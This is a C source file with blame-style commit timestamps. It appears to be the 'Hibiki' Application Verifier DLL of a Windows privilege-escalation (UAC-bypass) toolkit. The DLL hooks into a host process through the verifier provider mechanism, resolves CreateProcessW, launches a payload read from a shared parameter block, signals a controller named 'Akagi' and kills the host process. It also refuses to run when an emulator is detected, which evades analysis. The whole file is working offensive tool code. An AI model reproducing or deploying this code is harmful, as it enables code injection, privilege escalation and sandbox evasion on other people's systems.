2015-04-05 16:28:52 +00:00
|
|
|
/*******************************************************************************
|
|
|
|
|
*
|
2018-01-15 10:53:43 +00:00
|
|
|
* (C) COPYRIGHT AUTHORS, 2014 - 2018
|
2015-04-05 16:28:52 +00:00
|
|
|
*
|
|
|
|
|
* TITLE: DLLMAIN.C
|
|
|
|
|
*
|
2018-11-13 09:58:29 +00:00
|
|
|
* VERSION: 3.10
|
2015-04-05 16:28:52 +00:00
|
|
|
*
|
2018-11-21 05:14:29 +00:00
|
|
|
* DATE: 18 Nov 2018
|
2015-04-05 16:28:52 +00:00
|
|
|
*
|
2015-09-17 07:31:36 +00:00
|
|
|
* AVrf entry point, Hibiki Kai Ni.
|
2015-04-05 16:28:52 +00:00
|
|
|
*
|
|
|
|
|
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
|
|
|
|
|
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
|
|
|
|
|
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
|
|
|
|
|
* PARTICULAR PURPOSE.
|
|
|
|
|
*
|
|
|
|
|
*******************************************************************************/
|
2016-04-16 03:46:41 +00:00
|
|
|
|
|
|
|
|
#if !defined UNICODE
|
|
|
|
|
#error ANSI build is not supported
|
|
|
|
|
#endif
|
|
|
|
|
|
2018-11-21 05:14:29 +00:00
|
|
|
#include "shared\shared.h"
|
2018-10-11 08:42:35 +00:00
|
|
|
#include "shared\libinc.h"
|
2015-09-17 07:31:36 +00:00
|
|
|
|
2017-09-08 12:20:05 +00:00
|
|
|
#define LoadedMsg "Hibiki lock and loaded"
|
2015-09-17 07:31:36 +00:00
|
|
|
|
2015-04-05 16:28:52 +00:00
|
|
|
static RTL_VERIFIER_PROVIDER_DESCRIPTOR g_avrfProvider;
|
2015-11-05 05:35:55 +00:00
|
|
|
static RTL_VERIFIER_THUNK_DESCRIPTOR avrfThunks[2];
|
|
|
|
|
static RTL_VERIFIER_DLL_DESCRIPTOR avrfDlls[2];
|
2015-04-05 16:28:52 +00:00
|
|
|
static HMODULE g_pvKernel32;
|
|
|
|
|
|
2017-09-08 12:20:05 +00:00
|
|
|
PFNCREATEPROCESSW pCreateProcessW = NULL;
|
2015-04-05 16:28:52 +00:00
|
|
|
|
2018-11-13 09:58:29 +00:00
|
|
|
UACME_PARAM_BLOCK g_SharedParams;
|
|
|
|
|
|
2015-04-05 16:28:52 +00:00
|
|
|
/*
|
|
|
|
|
* ucmLoadCallback
|
|
|
|
|
*
|
|
|
|
|
* Purpose:
|
|
|
|
|
*
|
|
|
|
|
* Image load notify callback, when kernel32 available - acquire import and run target application.
|
|
|
|
|
*
|
|
|
|
|
*/
|
|
|
|
|
VOID NTAPI ucmLoadCallback(
|
2016-04-16 03:46:41 +00:00
|
|
|
PWSTR DllName,
|
|
|
|
|
PVOID DllBase,
|
|
|
|
|
SIZE_T DllSize,
|
|
|
|
|
PVOID Reserved
|
|
|
|
|
)
|
2015-04-05 16:28:52 +00:00
|
|
|
{
|
2018-11-13 09:58:29 +00:00
|
|
|
BOOL bSharedParamsReadOk;
|
|
|
|
|
|
|
|
|
|
NTSTATUS Status;
|
2017-09-08 12:20:05 +00:00
|
|
|
|
|
|
|
|
PWSTR lpParameter = NULL;
|
2018-11-13 09:58:29 +00:00
|
|
|
ULONG cbParameter = 0UL;
|
2017-09-08 12:20:05 +00:00
|
|
|
|
2016-04-16 03:46:41 +00:00
|
|
|
UNREFERENCED_PARAMETER(DllSize);
|
|
|
|
|
UNREFERENCED_PARAMETER(Reserved);
|
|
|
|
|
|
|
|
|
|
if (DllName == NULL) {
|
|
|
|
|
return;
|
|
|
|
|
}
|
|
|
|
|
|
2017-09-08 12:20:05 +00:00
|
|
|
if (_strcmpi(DllName, L"kernel32.dll") == 0) {
|
2018-11-21 05:14:29 +00:00
|
|
|
g_pvKernel32 = (HMODULE)DllBase;
|
2016-04-16 03:46:41 +00:00
|
|
|
}
|
|
|
|
|
|
2017-09-08 12:20:05 +00:00
|
|
|
if (_strcmpi(DllName, L"user32.dll") == 0) {
|
2016-04-16 03:46:41 +00:00
|
|
|
if (g_pvKernel32) {
|
2018-11-13 09:58:29 +00:00
|
|
|
|
2018-09-02 07:28:59 +00:00
|
|
|
#pragma warning(push)
|
|
|
|
|
#pragma warning(disable: 4152)
|
|
|
|
|
|
2018-11-21 05:14:29 +00:00
|
|
|
pCreateProcessW = (PFNCREATEPROCESSW)ucmLdrGetProcAddress(
|
2018-11-13 09:58:29 +00:00
|
|
|
(PCHAR)g_pvKernel32,
|
2017-09-08 12:20:05 +00:00
|
|
|
"CreateProcessW");
|
|
|
|
|
|
2018-09-02 07:28:59 +00:00
|
|
|
#pragma warning(pop)
|
|
|
|
|
|
2016-04-16 03:46:41 +00:00
|
|
|
if (pCreateProcessW != NULL) {
|
2017-09-08 12:20:05 +00:00
|
|
|
|
2018-11-13 09:58:29 +00:00
|
|
|
//
|
|
|
|
|
// Read shared params block.
|
|
|
|
|
//
|
|
|
|
|
RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
|
|
|
|
|
bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
|
|
|
|
|
if (bSharedParamsReadOk) {
|
|
|
|
|
lpParameter = g_SharedParams.szParameter;
|
|
|
|
|
cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
|
|
|
|
|
}
|
|
|
|
|
else {
|
|
|
|
|
lpParameter = NULL;
|
|
|
|
|
cbParameter = 0UL;
|
|
|
|
|
}
|
2017-09-08 12:20:05 +00:00
|
|
|
|
2018-11-13 09:58:29 +00:00
|
|
|
if (ucmLaunchPayloadEx(
|
2017-09-08 12:20:05 +00:00
|
|
|
pCreateProcessW,
|
|
|
|
|
lpParameter,
|
2018-11-13 09:58:29 +00:00
|
|
|
cbParameter))
|
2017-09-08 12:20:05 +00:00
|
|
|
{
|
2018-11-13 09:58:29 +00:00
|
|
|
Status = STATUS_SUCCESS;
|
|
|
|
|
}
|
|
|
|
|
else {
|
|
|
|
|
Status = STATUS_UNSUCCESSFUL;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
//
|
|
|
|
|
// Notify Akagi.
|
|
|
|
|
//
|
|
|
|
|
if (bSharedParamsReadOk) {
|
|
|
|
|
ucmSetCompletion(g_SharedParams.szSignalObject);
|
2017-09-08 12:20:05 +00:00
|
|
|
}
|
|
|
|
|
|
2018-11-13 09:58:29 +00:00
|
|
|
NtTerminateProcess(NtCurrentProcess(), Status);
|
2016-04-16 03:46:41 +00:00
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
2015-04-05 16:28:52 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* ucmRegisterProvider
|
|
|
|
|
*
|
|
|
|
|
* Purpose:
|
|
|
|
|
*
|
|
|
|
|
* Register provider and set up image load notify callback.
|
|
|
|
|
*
|
|
|
|
|
*/
|
|
|
|
|
VOID ucmRegisterProvider(
|
2016-04-16 03:46:41 +00:00
|
|
|
VOID
|
|
|
|
|
)
|
2015-04-05 16:28:52 +00:00
|
|
|
{
|
2016-04-16 03:46:41 +00:00
|
|
|
RtlSecureZeroMemory(&avrfThunks, sizeof(avrfThunks)); //for future case
|
2015-11-05 05:35:55 +00:00
|
|
|
|
2016-04-16 03:46:41 +00:00
|
|
|
avrfThunks[0].ThunkName = NULL;
|
|
|
|
|
avrfThunks[0].ThunkOldAddress = NULL;
|
|
|
|
|
avrfThunks[0].ThunkNewAddress = NULL;
|
2015-04-05 16:28:52 +00:00
|
|
|
|
2016-04-16 03:46:41 +00:00
|
|
|
RtlSecureZeroMemory(&avrfDlls, sizeof(avrfDlls)); //for future case
|
2015-11-05 05:35:55 +00:00
|
|
|
|
2016-04-16 03:46:41 +00:00
|
|
|
avrfDlls[0].DllName = NULL;
|
|
|
|
|
avrfDlls[0].DllFlags = 0;
|
|
|
|
|
avrfDlls[0].DllAddress = NULL;
|
|
|
|
|
avrfDlls[0].DllThunks = avrfThunks;
|
2015-04-05 16:28:52 +00:00
|
|
|
|
2016-04-16 03:46:41 +00:00
|
|
|
RtlSecureZeroMemory(&g_avrfProvider, sizeof(RTL_VERIFIER_PROVIDER_DESCRIPTOR));
|
|
|
|
|
g_avrfProvider.Length = sizeof(RTL_VERIFIER_PROVIDER_DESCRIPTOR);
|
|
|
|
|
g_avrfProvider.ProviderDlls = avrfDlls;
|
|
|
|
|
g_avrfProvider.ProviderDllLoadCallback = (RTL_VERIFIER_DLL_LOAD_CALLBACK)&ucmLoadCallback;
|
2015-04-05 16:28:52 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* DllMain
|
|
|
|
|
*
|
|
|
|
|
* Purpose:
|
|
|
|
|
*
|
|
|
|
|
* Verifier dll entry point, register verifier provider.
|
|
|
|
|
*
|
|
|
|
|
*/
|
|
|
|
|
BOOL WINAPI DllMain(
|
2016-04-16 03:46:41 +00:00
|
|
|
_In_ HINSTANCE hinstDLL,
|
|
|
|
|
_In_ DWORD fdwReason,
|
|
|
|
|
_In_ LPVOID lpvReserved
|
|
|
|
|
)
|
2015-04-05 16:28:52 +00:00
|
|
|
{
|
2018-11-21 05:14:29 +00:00
|
|
|
PRTL_VERIFIER_PROVIDER_DESCRIPTOR* pVPD = (PRTL_VERIFIER_PROVIDER_DESCRIPTOR*)lpvReserved;
|
2015-04-05 16:28:52 +00:00
|
|
|
|
2016-04-16 03:46:41 +00:00
|
|
|
UNREFERENCED_PARAMETER(hinstDLL);
|
2015-04-05 16:28:52 +00:00
|
|
|
|
2018-06-15 11:44:01 +00:00
|
|
|
if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED)
|
|
|
|
|
return FALSE;
|
|
|
|
|
|
2016-04-16 03:46:41 +00:00
|
|
|
switch (fdwReason) {
|
2015-04-05 16:28:52 +00:00
|
|
|
|
2016-04-16 03:46:41 +00:00
|
|
|
case DLL_PROCESS_VERIFIER:
|
2017-09-08 12:20:05 +00:00
|
|
|
DbgPrint(LoadedMsg);
|
2016-04-16 03:46:41 +00:00
|
|
|
ucmRegisterProvider();
|
|
|
|
|
*pVPD = &g_avrfProvider;
|
|
|
|
|
break;
|
|
|
|
|
}
|
2018-06-15 11:44:01 +00:00
|
|
|
|
2016-04-16 03:46:41 +00:00
|
|
|
return TRUE;
|
2015-04-05 16:28:52 +00:00
|
|
|
}
|
